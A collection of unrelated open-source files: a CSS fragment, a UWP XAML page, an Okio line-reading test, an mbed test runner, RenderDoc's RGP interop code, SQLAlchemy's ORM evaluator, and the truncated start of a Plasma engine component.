visibility: hidden;
}
.highlighter-nodeinfobar-container[locked] > .highlighter-nodeinfobar,
.highlighter-nodeinfobar-container:not([locked]):hover > .highlighter-nodeinfobar {
pointer-events: auto;
}
html|*.highlighter-nodeinfobar-id,
html|*.highlighter-nodeinfobar-classes,
html|*.highlighter-nodeinfobar-pseudo-classes,
html|*.highlighter-nodeinfobar-tagname {
-moz-user-select: text;
-moz-user-focus: normal;
cursor: text;
}
.highlighter-nodeinfobar-arrow {
display: none;
}
.highlighter-nodeinfobar-container[position="top"]:not([hide-arrow]) > .highlighter-nodeinfobar-arrow-bottom {
display: block;
}
.highlighter-nodeinfobar-container[position="bottom"]:not([hide-arrow]) > .highlighter-nodeinfobar-arrow-top {
display: block;
}
.highlighter-nodeinfobar-container[disabled] {
visibility: hidden;
}
html|*.highlighter-nodeinfobar-tagname {
text-transform: lowercase;
}
| {
"pile_set_name": "Github"
} |
<Page
x:Class="IntelligentKioskSample.Views.VisualAlert.VisualAlertBuilderPage"
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
xmlns:local="using:IntelligentKioskSample.Views.VisualAlert"
xmlns:ctl="using:IntelligentKioskSample.Controls"
xmlns:d="http://schemas.microsoft.com/expression/blend/2008"
xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
mc:Ignorable="d"
SizeChanged="OnPageSizeChanged"
x:Name="mainPage"
Background="{ThemeResource ApplicationPageBackgroundThemeBrush}">
<Page.Resources>
<SolidColorBrush x:Key="GrayColor" Color="White" Opacity="0.6" />
<ctl:ReverseVisibilityConverter x:Key="reverseVisibilityConverter"/>
</Page.Resources>
<Grid EntranceNavigationTransitionInfo.IsTargetElement="True">
<Grid.RowDefinitions>
<RowDefinition Height="auto" />
<RowDefinition />
</Grid.RowDefinitions>
<CommandBar x:Name="commandBar" Style="{StaticResource PageTitleCommandBarStyle}">
<CommandBar.Content>
<TextBlock Text="Visual Alert Builder" Style="{ThemeResource PageTitleTextBlockStyle}"/>
</CommandBar.Content>
</CommandBar>
<Grid Grid.Row="1" ColumnSpacing="12" Margin="24,30,0,0">
<Grid.ColumnDefinitions>
<ColumnDefinition Width="0.3*" MinWidth="220"/>
<ColumnDefinition Width="*"/>
</Grid.ColumnDefinitions>
<!-- Left panel: models -->
<Grid Grid.Column="0" VerticalAlignment="Stretch">
<!-- New alert wizard steps -->
<Grid x:Name="newAlertGrid">
<Grid.RowDefinitions>
<RowDefinition Height="Auto"/>
<RowDefinition/>
</Grid.RowDefinitions>
<StackPanel Spacing="14">
<TextBlock Text="New Alert" Style="{StaticResource SubtitleTextBlockStyle}"/>
<ctl:LifecycleControl x:Name="lifecycleControl" StepCollection="{Binding LifecycleStepCollection}"/>
</StackPanel>
<Button Grid.Row="1" VerticalAlignment="Bottom" Background="Transparent" Margin="0,0,0,40" Click="OnCancelNewAlert">
<StackPanel Orientation="Horizontal" Spacing="8">
<SymbolIcon Symbol="Cancel"/>
<TextBlock Text="Cancel new alert"/>
</StackPanel>
</Button>
</Grid>
<!-- Alert list -->
<StackPanel x:Name="scenarioListPanel" Spacing="6">
<Grid>
<Grid.ColumnDefinitions>
<ColumnDefinition />
<ColumnDefinition Width="Auto"/>
</Grid.ColumnDefinitions>
<TextBlock Text="Alerts" Style="{StaticResource SubtitleTextBlockStyle}"/>
<StackPanel Orientation="Horizontal" HorizontalAlignment="Right" Spacing="6">
<Button x:Name="deleteButton" Background="Transparent" HorizontalAlignment="Right" Click="OnDeleteScenariosButtonClicked" Visibility="Collapsed">
<FontIcon FontFamily="Segoe MDL2 Assets" Glyph=""/>
</Button>
<Button Background="Transparent" HorizontalAlignment="Right" Click="OnEditScenarioListButtonClicked">
<FontIcon FontFamily="Segoe MDL2 Assets" Glyph=""/>
</Button>
</StackPanel>
</Grid>
<ListView x:Name="scenarioListView" SelectionMode="Single" Margin="12,22,0,0"
ItemsSource="{Binding ScenarioCollection}" SelectionChanged="OnScenarioListViewSelectionChanged">
<ListView.ItemTemplate>
<DataTemplate>
<TextBlock Text="{Binding Name}"/>
</DataTemplate>
</ListView.ItemTemplate>
</ListView>
<Grid x:Name="newAlertStatusGrid" Visibility="Collapsed" RowSpacing="6">
<Grid.RowDefinitions>
<RowDefinition />
<RowDefinition />
</Grid.RowDefinitions>
<StackPanel Orientation="Horizontal" Spacing="6" Margin="24,6,0,0">
<TextBlock x:Name="alertNameTextBlock" Foreground="{StaticResource GrayColor}" />
<TextBlock x:Name="alertStatusTextBlock" Foreground="{StaticResource GrayColor}" />
</StackPanel>
<ProgressBar Grid.Row="1" x:Name="newAlertProgressBar" Background="#0078D7" HorizontalAlignment="Stretch" ShowPaused="False" ShowError="False"/>
</Grid>
<Button x:Name="newAlertButton" Foreground="#0078D7" Background="Transparent" Margin="12,20,0,0" Click="OnNewAlertButtonClicked">
<StackPanel Orientation="Horizontal" Spacing="12">
<SymbolIcon Symbol="Add"/>
<TextBlock Text="New alert"/>
</StackPanel>
</Button>
</StackPanel>
</Grid>
<!-- Camera control, builder wizard and result grid -->
<Grid x:Name="centralGrid" Grid.Column="1" VerticalAlignment="Stretch" HorizontalAlignment="Stretch">
<Grid.RowDefinitions>
<RowDefinition Height="7*" MinHeight="250"/>
<RowDefinition Height="3*"/>
<RowDefinition Height="200"/>
</Grid.RowDefinitions>
<Border x:Name="webCamHostGridParent" Grid.Row="0" Grid.RowSpan="2" HorizontalAlignment="Stretch" VerticalAlignment="Stretch">
<Grid x:Name="webCamHostGrid">
<ctl:CameraControl x:Name="cameraControl" FlowDirection="LeftToRight" ImageCaptured="OnCameraPhotoCaptured" ContinuousCaptured="OnCameraContinuousPhotoCaptured"/>
</Grid>
</Border>
<Grid Grid.Row="0" Grid.RowSpan="2" Name="cameraGuideCountdownHost" Visibility="Collapsed">
<Grid.RowDefinitions>
<RowDefinition Height="0.05*"/>
<RowDefinition/>
<RowDefinition Height="0.2*"/>
</Grid.RowDefinitions>
<Viewbox Grid.Row="1">
<TextBlock Name="countDownTextBlock" Foreground="White" FontWeight="Bold" Opacity="0.9"/>
</Viewbox>
</Grid>
<local:VisualAlertBuilderWizardControl Grid.Row="1" Grid.RowSpan="2" x:Name="visualAlertBuilderWizardControl" MinWidth="500"
WizardStepChanged="OnBuilderWizardControlStepChanged"
WizardCompleted="OnBuilderWizardControlCompleted"/>
<Grid x:Name="resultGrid" Grid.Row="2" Grid.RowSpan="1" Margin="0,26,0,0" MinWidth="500" VerticalAlignment="Top"
Visibility="{Binding ElementName=visualAlertBuilderWizardControl, Path=Visibility, Converter={StaticResource reverseVisibilityConverter}}">
<Grid.ColumnDefinitions>
<ColumnDefinition Width="Auto"/>
<ColumnDefinition Width="Auto"/>
<ColumnDefinition Width="*"/>
</Grid.ColumnDefinitions>
<StackPanel Orientation="Horizontal" Spacing="18" VerticalAlignment="Top">
<FontIcon x:Name="alertIcon" FontFamily="Segoe MDL2 Assets" Glyph="" FontSize="46" Visibility="Collapsed"/>
<TextBlock x:Name="alertTextBlock" Style="{StaticResource HeaderTextBlockStyle}" Foreground="White" VerticalAlignment="Center"/>
</StackPanel>
<TextBlock Grid.Column="1" x:Name="alertProbability" Style="{StaticResource SubheaderTextBlockStyle}" Margin="12,6,0,0"
VerticalAlignment="Center" Foreground="{StaticResource GrayColor}" Visibility="Collapsed"/>
<TextBlock Grid.Column="2" x:Name="fpsTextBlock" Style="{StaticResource SubheaderTextBlockStyle}"
HorizontalAlignment="Right" VerticalAlignment="Center" Foreground="{StaticResource GrayColor}"/>
</Grid>
</Grid>
</Grid>
<ProgressRing x:Name="progressRing" Grid.Row="1" Width="100" Height="100" Foreground="White"/>
</Grid>
</Page>
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2014 Square, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package okio;
import java.io.EOFException;
import java.io.IOException;
import java.util.Arrays;
import java.util.List;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.junit.runners.Parameterized;
import static kotlin.text.StringsKt.repeat;
import static okio.TestUtil.SEGMENT_SIZE;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertTrue;
import static org.junit.Assert.fail;
@RunWith(Parameterized.class)
public final class ReadUtf8LineTest {
private interface Factory {
BufferedSource create(Buffer data);
}
@Parameterized.Parameters(name = "{0}")
public static List<Object[]> parameters() {
return Arrays.asList(
new Object[] { new Factory() {
@Override public BufferedSource create(Buffer data) {
return data;
}
@Override public String toString() {
return "Buffer";
}
}},
new Object[] { new Factory() {
@Override public BufferedSource create(Buffer data) {
return new RealBufferedSource(data);
}
@Override public String toString() {
return "RealBufferedSource";
}
}},
new Object[] { new Factory() {
@Override public BufferedSource create(Buffer data) {
return new RealBufferedSource(new ForwardingSource(data) {
@Override public long read(Buffer sink, long byteCount) throws IOException {
return super.read(sink, Math.min(1, byteCount));
}
});
}
@Override public String toString() {
return "Slow RealBufferedSource";
}
}}
);
}
@Parameterized.Parameter
public Factory factory;
private Buffer data;
private BufferedSource source;
@Before public void setUp() {
data = new Buffer();
source = factory.create(data);
}
@Test public void readLines() throws IOException {
data.writeUtf8("abc\ndef\n");
assertEquals("abc", source.readUtf8LineStrict());
assertEquals("def", source.readUtf8LineStrict());
try {
source.readUtf8LineStrict();
fail();
} catch (EOFException expected) {
assertEquals("\\n not found: limit=0 content=…", expected.getMessage());
}
}
@Test public void readUtf8LineStrictWithLimits() throws IOException {
int[] lens = {1, SEGMENT_SIZE - 2, SEGMENT_SIZE - 1, SEGMENT_SIZE, SEGMENT_SIZE * 10};
for (int len : lens) {
data.writeUtf8(repeat("a", len)).writeUtf8("\n");
assertEquals(len, source.readUtf8LineStrict(len).length());
source.readUtf8();
data.writeUtf8(repeat("a", len)).writeUtf8("\n").writeUtf8(repeat("a", len));
assertEquals(len, source.readUtf8LineStrict(len).length());
source.readUtf8();
data.writeUtf8(repeat("a", len)).writeUtf8("\r\n");
assertEquals(len, source.readUtf8LineStrict(len).length());
source.readUtf8();
data.writeUtf8(repeat("a", len)).writeUtf8("\r\n").writeUtf8(repeat("a", len));
assertEquals(len, source.readUtf8LineStrict(len).length());
source.readUtf8();
}
}
@Test public void readUtf8LineStrictNoBytesConsumedOnFailure() throws IOException {
data.writeUtf8("abc\n");
try {
source.readUtf8LineStrict(2);
fail();
} catch (EOFException expected) {
assertTrue(expected.getMessage().startsWith("\\n not found: limit=2 content=61626"));
}
assertEquals("abc", source.readUtf8LineStrict(3));
}
@Test public void readUtf8LineStrictEmptyString() throws IOException {
data.writeUtf8("\r\nabc");
assertEquals("", source.readUtf8LineStrict(0));
assertEquals("abc", source.readUtf8());
}
@Test public void readUtf8LineStrictNonPositive() throws IOException {
data.writeUtf8("\r\n");
try {
source.readUtf8LineStrict(-1);
fail("Expected failure: limit must be greater than 0");
} catch (IllegalArgumentException expected) {
}
}
@Test public void eofExceptionProvidesLimitedContent() throws IOException {
data.writeUtf8("aaaaaaaabbbbbbbbccccccccdddddddde");
try {
source.readUtf8LineStrict();
fail();
} catch (EOFException expected) {
assertEquals("\\n not found: limit=33 content=616161616161616162626262626262626363636363636363"
+ "6464646464646464…", expected.getMessage());
}
}
@Test public void newlineAtEnd() throws IOException {
data.writeUtf8("abc\n");
assertEquals("abc", source.readUtf8LineStrict(3));
assertTrue(source.exhausted());
data.writeUtf8("abc\r\n");
assertEquals("abc", source.readUtf8LineStrict(3));
assertTrue(source.exhausted());
data.writeUtf8("abc\r");
try {
source.readUtf8LineStrict(3);
fail();
} catch (EOFException expected) {
assertEquals("\\n not found: limit=3 content=6162630d…", expected.getMessage());
}
source.readUtf8();
data.writeUtf8("abc");
try {
source.readUtf8LineStrict(3);
fail();
} catch (EOFException expected) {
assertEquals("\\n not found: limit=3 content=616263…", expected.getMessage());
}
}
@Test public void emptyLines() throws IOException {
data.writeUtf8("\n\n\n");
assertEquals("", source.readUtf8LineStrict());
assertEquals("", source.readUtf8LineStrict());
assertEquals("", source.readUtf8LineStrict());
assertTrue(source.exhausted());
}
@Test public void crDroppedPrecedingLf() throws IOException {
data.writeUtf8("abc\r\ndef\r\nghi\rjkl\r\n");
assertEquals("abc", source.readUtf8LineStrict());
assertEquals("def", source.readUtf8LineStrict());
assertEquals("ghi\rjkl", source.readUtf8LineStrict());
}
@Test public void bufferedReaderCompatible() throws IOException {
data.writeUtf8("abc\ndef");
assertEquals("abc", source.readUtf8Line());
assertEquals("def", source.readUtf8Line());
assertEquals(null, source.readUtf8Line());
}
@Test public void bufferedReaderCompatibleWithTrailingNewline() throws IOException {
data.writeUtf8("abc\ndef\n");
assertEquals("abc", source.readUtf8Line());
assertEquals("def", source.readUtf8Line());
assertEquals(null, source.readUtf8Line());
}
}
| {
"pile_set_name": "Github"
} |
#include "CommandLineTestRunner.h"
#include <stdio.h>
#include "mbed.h"
#include "testrunner.h"
#include "test_env.h"
/**
Object 'mbed_cpputest_console' is used to show prints on console.
It is declared in \cpputest\src\Platforms\armcc\UtestPlatform.cpp
*/
Serial mbed_cpputest_console(STDIO_UART_TX, STDIO_UART_RX);
int main(int ac, char** av) {
MBED_HOSTTEST_TIMEOUT(20);
MBED_HOSTTEST_SELECT(default_auto);
MBED_HOSTTEST_DESCRIPTION(Unit test);
MBED_HOSTTEST_START("UT");
unsigned failureCount = 0;
{
// Some compilers may not pass ac, av so we need to supply them ourselves
int ac = 2;
char* av[] = {__FILE__, "-v"};
failureCount = CommandLineTestRunner::RunAllTests(ac, av);
}
MBED_HOSTTEST_RESULT(failureCount == 0);
return failureCount;
}
| {
"pile_set_name": "Github"
} |
/******************************************************************************
* The MIT License (MIT)
*
* Copyright (c) 2019-2020 Baldur Karlsson
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
******************************************************************************/
#include "RGPInterop.h"
#include <QApplication>
#include <QTcpServer>
#include <QTcpSocket>
bool RGPInterop::RGPSupportsInterop(const QString &RGPPath)
{
uint32_t majorVersion = 0;
uint32_t minorVersion = 0;
const char *searchString = "RGPVersion=";
const int searchStringLength = (int)strlen(searchString);
// look for an embedded string in the exe
QFile f(RGPPath);
if(f.open(QIODevice::ReadOnly))
{
QByteArray contents = f.readAll();
int search = 0;
do
{
int needle = contents.indexOf("RGPVersion=", search);
if(needle == -1)
break;
search = needle + searchStringLength;
// bail if there isn't enough room for the string plus X.Y
if(contents.size() - needle < searchStringLength + 3)
break;
// get the major version number
const char *major = contents.data() + search;
const char *sep = major;
// find the separator
while(*sep >= '0' && *sep <= '9')
sep++;
// get the minor version number
const char *minor = sep + 1;
const char *end = minor;
// find the end
while(*end >= '0' && *end <= '9')
end++;
// convert the strings to integers
QByteArray majorStr(major, sep - major);
QByteArray minorStr(minor, end - minor);
bool ok = false;
majorVersion = majorStr.toUInt(&ok);
if(!ok)
{
majorVersion = 0;
continue;
}
minorVersion = minorStr.toUInt(&ok);
if(!ok)
{
majorVersion = minorVersion = 0;
continue;
}
// found the version
break;
} while(search >= 0);
}
// interop supported in RGP V1.2 and higher
if(majorVersion > 1 || (majorVersion == 1 && minorVersion > 1))
{
return true;
}
return false;
}
template <>
rdcstr DoStringise(const RGPCommand &el)
{
BEGIN_ENUM_STRINGISE(RGPCommand);
{
STRINGISE_ENUM_CLASS_NAMED(Initialize, "initialize");
STRINGISE_ENUM_CLASS_NAMED(SetEvent, "set_event");
STRINGISE_ENUM_CLASS_NAMED(Terminate, "terminate");
}
END_ENUM_STRINGISE();
}
RGPInterop::RGPInterop(ICaptureContext &ctx) : m_Ctx(ctx)
{
m_Server = new QTcpServer(NULL);
m_Server->listen(QHostAddress::Any, Port);
QObject::connect(m_Server, &QTcpServer::newConnection, [this]() {
if(m_Socket == NULL)
{
m_Socket = m_Server->nextPendingConnection();
ConnectionEstablished();
}
else
{
// close any other connections while we already have one
delete m_Server->nextPendingConnection();
}
});
}
RGPInterop::~RGPInterop()
{
RGPInteropTerminate terminate;
QString encoded = EncodeCommand(RGPCommand::Terminate, terminate.toParams(m_Version));
if(m_Socket)
{
m_Socket->write(encoded.trimmed().toUtf8().data());
m_Socket->waitForBytesWritten();
}
m_Server->close();
delete m_Server;
}
void RGPInterop::InitializeRGP()
{
RGPInteropInit init;
init.interop_version = 1;
init.interop_name = lit("RenderDoc");
QString encoded = EncodeCommand(RGPCommand::Initialize, init.toParams(m_Version));
if(m_Socket)
{
m_Socket->write(encoded.trimmed().toUtf8().data());
}
}
bool RGPInterop::HasRGPEvent(uint32_t eventId)
{
if(m_Version == 0)
return false;
if(m_Socket == NULL)
return false;
return m_Event2RGP[eventId].interoplinearid != 0;
}
bool RGPInterop::SelectRGPEvent(uint32_t eventId)
{
if(m_Version == 0)
return false;
RGPInteropEvent ev = m_Event2RGP[eventId];
if(ev.interoplinearid == 0)
return false;
QString encoded = EncodeCommand(RGPCommand::SetEvent, ev.toParams(m_Version));
if(m_Socket)
{
m_Socket->write(encoded.trimmed().toUtf8().data());
return true;
}
return false;
}
void RGPInterop::EventSelected(RGPInteropEvent event)
{
uint32_t eventId = m_RGP2Event[event.interoplinearid];
if(eventId == 0)
{
qWarning() << "RGP Event " << event.interoplinearid << event.cmdbufid << event.eventname
<< " did not correspond to a known eventId";
return;
}
const DrawcallDescription *draw = m_Ctx.GetDrawcall(eventId);
if(draw && QString(draw->name) != event.eventname)
qWarning() << "Drawcall name mismatch. Expected " << event.eventname << " but got "
<< QString(draw->name);
m_Ctx.SetEventID({}, eventId, eventId);
BringToForeground(m_Ctx.GetMainWindow()->Widget());
}
void RGPInterop::ConnectionEstablished()
{
QObject::connect(m_Socket, &QAbstractSocket::disconnected, [this]() {
m_Socket->deleteLater();
m_Socket = NULL;
});
// initial handshake and protocol version
InitializeRGP();
// TODO: negotiate mapping version
uint32_t version = 1;
CreateMapping(version);
// add a handler that appends all data to the read buffer and processes each time more comes in.
QObject::connect(m_Socket, &QIODevice::readyRead, [this]() {
// append all available data
m_ReadBuffer += m_Socket->readAll();
// process the read buffer
ProcessReadBuffer();
});
}
void RGPInterop::CreateMapping(const rdcarray<DrawcallDescription> &drawcalls)
{
const SDFile &file = m_Ctx.GetStructuredFile();
for(const DrawcallDescription &draw : drawcalls)
{
for(const APIEvent &ev : draw.events)
{
if(ev.chunkIndex == 0 || ev.chunkIndex >= file.chunks.size())
continue;
const SDChunk *chunk = file.chunks[ev.chunkIndex];
if(m_EventNames.contains(chunk->name, Qt::CaseSensitive))
{
m_Event2RGP[ev.eventId].interoplinearid = (uint32_t)m_RGP2Event.size();
if(ev.eventId == draw.eventId)
m_Event2RGP[ev.eventId].eventname = draw.name;
else
m_Event2RGP[ev.eventId].eventname = chunk->name;
m_RGP2Event.push_back(ev.eventId);
}
}
// if we have children, step into them first before going to our next sibling
if(!draw.children.empty())
CreateMapping(draw.children);
}
}
void RGPInterop::CreateMapping(uint32_t version)
{
m_Version = version;
if(m_Ctx.APIProps().pipelineType == GraphicsAPI::Vulkan)
{
if(version == 1)
{
m_EventNames << lit("vkCmdDispatch") << lit("vkCmdDraw") << lit("vkCmdDrawIndexed");
}
}
else if(m_Ctx.APIProps().pipelineType == GraphicsAPI::D3D12)
{
// these names must match those in DoStringise(const D3D12Chunk &el) for the chunks
if(version == 1)
{
m_EventNames << lit("ID3D12GraphicsCommandList::Dispatch")
<< lit("ID3D12GraphicsCommandList::DrawInstanced")
<< lit("ID3D12GraphicsCommandList::DrawIndexedInstanced");
}
}
// if we don't have any event names, this API doesn't have a mapping or this was an unrecognised
// version.
if(m_EventNames.isEmpty())
return;
m_Event2RGP.resize(m_Ctx.GetLastDrawcall()->eventId + 1);
// linearId 0 is invalid, so map to eventId 0.
// the first real event will be linearId 1
m_RGP2Event.push_back(0);
CreateMapping(m_Ctx.CurDrawcalls());
}
QString RGPInterop::EncodeCommand(RGPCommand command, QVariantList params)
{
QString ret;
QString cmd = ToQStr(command);
ret += lit("command=%1\n").arg(cmd);
// iterate params in pair, name and value
for(int i = 0; i + 1 < params.count(); i += 2)
ret += QFormatStr("%1.%2=%3\n").arg(cmd).arg(params[i].toString()).arg(params[i + 1].toString());
ret += lit("endcommand=%1\n").arg(cmd);
return ret;
}
bool RGPInterop::DecodeCommand(QString command)
{
QStringList lines = command.trimmed().split(QLatin1Char('\n'));
if(lines[0].indexOf(lit("command=")) != 0 || lines.last().indexOf(lit("endcommand=")) != 0)
{
qWarning() << "Malformed RGP command:\n" << command;
return false;
}
QString commandName = lines[0].split(QLatin1Char('='))[1];
if(lines.last().split(QLatin1Char('='))[1] != commandName)
{
qWarning() << "Mismatch between command and endcommand:\n" << command;
return false;
}
lines.pop_front();
lines.pop_back();
QVariantList params;
QString prefix = commandName + lit(".");
for(QString ¶m : lines)
{
int eq = param.indexOf(QLatin1Char('='));
if(eq < 0)
{
qWarning() << "Malformed param: " << param;
continue;
}
QString key = param.left(eq);
QString value = param.mid(eq + 1);
if(!key.startsWith(prefix))
{
qWarning() << "Malformed param key for" << commandName << ": " << key;
continue;
}
key = key.mid(prefix.count());
params << key << value;
}
if(commandName == ToQStr(RGPCommand::SetEvent))
{
RGPInteropEvent ev;
ev.fromParams(m_Version, params);
EventSelected(ev);
return true;
}
else if(commandName == ToQStr(RGPCommand::Initialize))
{
RGPInteropInit init;
init.fromParams(m_Version, params);
// TODO: decode the params here. This will contain the interop
// version and the name of the tool connected to RenderDoc
return true;
}
else if(commandName == ToQStr(RGPCommand::Terminate))
{
// RGP has shut down so disconnect the socket etc
emit m_Socket->disconnected();
return true;
}
else
{
qWarning() << "Unrecognised command: " << commandName;
}
return false;
}
void RGPInterop::ProcessReadBuffer()
{
// we might have partial data, so wait until we have a full command
do
{
int idx = m_ReadBuffer.indexOf("endcommand=");
// if we don't have endcommand= yet, we don't have a full command
if(idx < 0)
return;
idx = m_ReadBuffer.indexOf('\n', idx);
// also break if we don't have the full line yet including newline.
if(idx < 0)
return;
// extract the command and decode as UTF-8
QString command = QString::fromUtf8(m_ReadBuffer.data(), idx + 1);
// remove the command from our buffer, to retain any partial subsequent command we might have
m_ReadBuffer.remove(0, idx + 1);
// process this command
DecodeCommand(command);
// loop again - we might have read multiple commands
} while(true);
}
| {
"pile_set_name": "Github"
} |
# orm/evaluator.py
# Copyright (C) 2005-2019 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
import operator
from .. import inspect
from .. import util
from ..sql import operators
class UnevaluatableError(Exception):
pass
_straight_ops = set(
getattr(operators, op)
for op in (
"add",
"mul",
"sub",
"div",
"mod",
"truediv",
"lt",
"le",
"ne",
"gt",
"ge",
"eq",
)
)
_notimplemented_ops = set(
getattr(operators, op)
for op in (
"like_op",
"notlike_op",
"ilike_op",
"notilike_op",
"between_op",
"in_op",
"notin_op",
"endswith_op",
"concat_op",
)
)
class EvaluatorCompiler(object):
def __init__(self, target_cls=None):
self.target_cls = target_cls
def process(self, clause):
meth = getattr(self, "visit_%s" % clause.__visit_name__, None)
if not meth:
raise UnevaluatableError(
"Cannot evaluate %s" % type(clause).__name__
)
return meth(clause)
def visit_grouping(self, clause):
return self.process(clause.element)
def visit_null(self, clause):
return lambda obj: None
def visit_false(self, clause):
return lambda obj: False
def visit_true(self, clause):
return lambda obj: True
def visit_column(self, clause):
if "parentmapper" in clause._annotations:
parentmapper = clause._annotations["parentmapper"]
if self.target_cls and not issubclass(
self.target_cls, parentmapper.class_
):
raise UnevaluatableError(
"Can't evaluate criteria against alternate class %s"
% parentmapper.class_
)
key = parentmapper._columntoproperty[clause].key
else:
key = clause.key
if (
self.target_cls
and key in inspect(self.target_cls).column_attrs
):
util.warn(
"Evaluating non-mapped column expression '%s' onto "
"ORM instances; this is a deprecated use case. Please "
"make use of the actual mapped columns in ORM-evaluated "
"UPDATE / DELETE expressions." % clause
)
else:
raise UnevaluatableError("Cannot evaluate column: %s" % clause)
get_corresponding_attr = operator.attrgetter(key)
return lambda obj: get_corresponding_attr(obj)
def visit_clauselist(self, clause):
evaluators = list(map(self.process, clause.clauses))
if clause.operator is operators.or_:
def evaluate(obj):
has_null = False
for sub_evaluate in evaluators:
value = sub_evaluate(obj)
if value:
return True
has_null = has_null or value is None
if has_null:
return None
return False
elif clause.operator is operators.and_:
def evaluate(obj):
for sub_evaluate in evaluators:
value = sub_evaluate(obj)
if not value:
if value is None:
return None
return False
return True
else:
raise UnevaluatableError(
"Cannot evaluate clauselist with operator %s" % clause.operator
)
return evaluate
def visit_binary(self, clause):
eval_left, eval_right = list(
map(self.process, [clause.left, clause.right])
)
operator = clause.operator
if operator is operators.is_:
def evaluate(obj):
return eval_left(obj) == eval_right(obj)
elif operator is operators.isnot:
def evaluate(obj):
return eval_left(obj) != eval_right(obj)
elif operator in _straight_ops:
def evaluate(obj):
left_val = eval_left(obj)
right_val = eval_right(obj)
if left_val is None or right_val is None:
return None
return operator(eval_left(obj), eval_right(obj))
else:
raise UnevaluatableError(
"Cannot evaluate %s with operator %s"
% (type(clause).__name__, clause.operator)
)
return evaluate
def visit_unary(self, clause):
eval_inner = self.process(clause.element)
if clause.operator is operators.inv:
def evaluate(obj):
value = eval_inner(obj)
if value is None:
return None
return not value
return evaluate
raise UnevaluatableError(
"Cannot evaluate %s with operator %s"
% (type(clause).__name__, clause.operator)
)
def visit_bindparam(self, clause):
if clause.callable:
val = clause.callable()
else:
val = clause.value
return lambda obj: val
| {
"pile_set_name": "Github"
} |
/*==LICENSE==*
CyanWorlds.com Engine - MMOG client, server and tools
Copyright (C) 2011 Cyan Worlds, Inc.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Additional permissions under GNU GPL version 3 section 7
If you modify this Program, or any covered work, by linking or
combining it with any of RAD Game Tools Bink SDK, Autodesk 3ds Max SDK,
NVIDIA PhysX SDK, Microsoft DirectX SDK, OpenSSL library, Independent
JPEG Group JPEG library, Microsoft Windows Media SDK, or Apple QuickTime SDK
(or a modified version of those libraries),
containing parts covered by the terms of the Bink SDK EULA, 3ds Max EULA,
PhysX SDK EULA, DirectX SDK EULA, OpenSSL and SSLeay licenses, IJG
JPEG Library README, Windows Media SDK EULA, or QuickTime SDK EULA, the
licensors of this Program grant you additional
permission to convey the resulting work. Corresponding Source for a
non-source form of such a combination shall include the source code for
the parts of OpenSSL and IJG JPEG Library used as well as that of the covered
work.
You can contact Cyan Worlds, Inc. by email [email protected]
or by snail mail at:
Cyan Worlds, Inc.
14617 N Newport Hwy
Mead, WA 99021
*==LICENSE==*/
#include "HeadSpin.h"
#include "hsResMgr.h"
#include "plComponentReg.h"
#include "plActivatorBaseComponent.h"
#include "plResponderComponent.h"
#include "MaxMain/plMaxNode.h"
#include "resource.h"
#pragma hdrstop
#include "plClickableComponent.h"
#include "pnSceneObject/plSceneObject.h"
#include "pnSceneObject/plSimulationInterface.h"
#include "pnKeyedObject/hsKeyedObject.h"
#include "plPhysical/plCollisionDetector.h" // MM
#include "plModifier/plLogicModifier.h"
#include "pnModifier/plConditionalObject.h"
#include "plPhysical/plPickingDetector.h"
#include "pfConditional/plActivatorConditionalObject.h"
#include "pfConditional/plFacingConditionalObject.h"
#include "pfConditional/plObjectInBoxConditionalObject.h"
#include "pnMessage/plObjRefMsg.h"
#include "pnMessage/plNotifyMsg.h"
#include "pnMessage/plCursorChangeMsg.h"
#include "MaxConvert/plConvert.h"
#include "MaxMain/plPhysicalProps.h"
#include "plPhysical/plSimDefs.h"
#include "MaxMain/plPhysicalProps.h"
void DummyCodeIncludeFuncClickable() {}
CLASS_DESC(plClickableComponent, gClickableDesc, "Clickable", "Clickable", COMP_TYPE_DETECTOR, CLICKABLE_CID)
enum
{
kClickableDirectional,
kClickableDegrees,
kClickableUseProxy,
kClickableProxy,
kClickableUseRegion,
kClickableProxyRegion,
kClickableToggle_DEAD,
kClickableOneShot,
kClickableBoundsType,
kClickableEnabled,
kClickablePhysical,
kClickableIgnoreProxyRegion,
kClickableFriction,
};
ParamBlockDesc2 gClickableBlock
(
